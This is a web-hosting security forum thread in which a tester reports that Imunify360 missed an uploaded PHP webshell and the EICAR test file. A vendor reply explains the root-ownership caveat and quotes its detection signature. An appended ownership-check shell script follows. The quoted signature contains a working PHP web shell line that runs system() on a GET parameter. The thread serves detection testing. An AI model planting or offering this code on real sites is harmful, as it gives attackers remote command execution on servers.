Testing protections fails

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Testing protections fails

    Hello,

    I was testing the product before purchase, and I noticed some issues and a lack of information around testing PHP Hardening.

    To enable Hardened PHP, I needed to find proper documentation; it was painful.
    Even the following command was not accurate:

    imunify360-agent features status hardened-php was saying I had the handlers installed when I did not.

    Could you guys provide some intended test cases/examples to know if it's working?


    Some of the other tests I did were to upload a malicious PHP file and execute commands, like the EICAR test, successfully.
    • Upload PHP webshell via SCP, NOT DETECTED (VirusTotal hash: 45eb1bc5e5f4f3620eeb2ef62c311ab908defa3cb0f0b162e662978d7783fb3f)
    • Manually scan the webshell PHP file providing the full path: "No malware found"
    • Used the webshell to download the EICAR file as provided in the FAQ: wget http://www.eicar.org/download/eicar.com.txt -O /tmp/eicar.com.txt NOT DETECTED
    • Upload the EICAR file via SCP. NOT DETECTED
    • Manually scan the EICAR file: "No malware found"

    Running Plesk on a Linux server: 4.19.0-23-amd64 #1 SMP Debian 4.19.269-1 (2022-12-20) x86_64 GNU/Linux
    i360 settings are all enabled: real-time protection, PHP hardening, etc.

    Thanks in advance,
    Regards,



    Links:
    Hardened PHP: https://cloudlinux.zendesk.com/hc/en...-on-Imunify360
    FAQ: https://docs.imunify360.com/faq_and_...ity-scan-works
    VT: https://www.virustotal.com/gui/file/...fa3cb0f0b162e662978d7783fb3f

  • #2
    Hello,

    Even the following command was not accurate:

    imunify360-agent features status hardened-php was saying I had the handlers installed when I did not.


    Could you please provide us with the output of this command?

    • Upload php webshell via scp, NOT DETECTED (virustotal hash: 45eb1bc5e5f4f3620eeb2ef62c311ab908defa3cb0f0b162e662978d7783fb3f)
    • Manually scan the webshell php file providing fullpath: "No malware found"
    • Used the webshell to download eicar file as provided in FAQ: wget http://www.eicar.org/download/eicar.com.txt -O /tmp/eicar.com.txt NOT DETECTED
    • Upload via SCP the eicar file. NOT DETECTED
    • Manually scan the eicar file: "No malware found"
    The undetected results might be caused by the ownership/permissions of the file uploaded. For example, if you upload a file to the user's directory as root, it won't be detected by the Imunify scanner: https://cloudlinux.zendesk.com/hc/en...-owned-by-root

    I've checked the provided hash with the latest build of our scan and can confirm our malware database has this hash – it is detected with the following signature:

    HTML Code:
      php_malware:
        fn: /var/imunify360-malware-sigs-server/data/builds/12836/scan/1728048754/04a00fef483d1c2f2632cbd40aef98799fc9bd0ad4b0bca7e234bdc0c15a547f
        sig: ...RVER['PHP_SELF']);?>"><input type="TEXT" name="cmd" id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre> @!!!><?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?></pre></body><script>document.getElementById("cmd").focus( );</scr
        ct: 1728048753
        mt: 1728048753
        sz: 347
        et: 1728048758
        hash: 351f51d22cf6c5f9512a8114ecbfcac79c465713
        sigid: id_64c1e4d1
        sha256: 45eb1bc5e5f4f3620eeb2ef62c311ab908defa3cb0f0b162e662978d7783fb3f
        sn: SMW-INJ-03765-php.bkdr.wshll-12
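    Added example (not from this thread, from CloudLinux, or from Imunify360's own tooling): a small POSIX shell pre-flight check for the ownership caveat raised in reply #2. Before recording a test file as "not detected", it reports whether the file's owner matches the owner of the directory it sits in, and prints the file's SHA-256 so it can be compared against the hash the vendor confirmed above. The function names, output format and any paths are assumptions made for illustration; `stat -c` and `sha256sum` are GNU coreutils, which fits the Debian host described in the post.

```shell
#!/bin/sh
# Added example, not part of the original thread or of Imunify360.
# Purpose: rule out the "file owned by root inside a user's directory" case
# before concluding the scanner missed a sample, and record the sample's
# SHA-256 for comparison with the vendor's detection record.
# All names and paths here are assumptions for illustration.

# uid_of PATH -> prints the numeric owner UID of PATH (GNU stat).
uid_of() {
    stat -c %u "$1"
}

# verdict FILE_UID DIR_UID -> OK when both UIDs agree, else OWNER-MISMATCH.
# A mismatch is the situation the linked article describes (e.g. root-owned
# file dropped into a user's web root via SCP as root).
verdict() {
    if [ "$1" = "$2" ]; then
        echo OK
    else
        echo OWNER-MISMATCH
    fi
}

# file_sha256 FILE -> prints only the lowercase hex SHA-256 digest.
file_sha256() {
    sha256sum "$1" | awk '{print $1}'
}

# check_upload FILE -> prints one verdict line and returns 0 only when the
# file exists and its owner matches the parent directory's owner.
check_upload() {
    f="$1"
    if [ ! -f "$f" ]; then
        echo "MISSING $f"
        return 1
    fi
    file_uid=$(uid_of "$f")
    dir_uid=$(uid_of "$(dirname "$f")")
    status=$(verdict "$file_uid" "$dir_uid")
    printf '%s uid=%s dir_uid=%s sha256=%s %s\n' \
        "$status" "$file_uid" "$dir_uid" "$(file_sha256 "$f")" "$f"
    [ "$status" = OK ]
}

# main FILE... -> checks every argument; exit status 1 if any file fails.
main() {
    rc=0
    for f in "$@"; do
        check_upload "$f" || rc=1
    done
    return "$rc"
}

main "$@"
```

    Usage (assumed path): `sh check_upload.sh /var/www/vhosts/example.com/httpdocs/test.php` right after the SCP upload. An OWNER-MISMATCH line means the file is in the state the linked article says the scanner skips, so fix ownership (chown to the site user) and rescan before treating the result as a miss; the printed sha256 can be matched against the `sha256:` field in the vendor's record.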
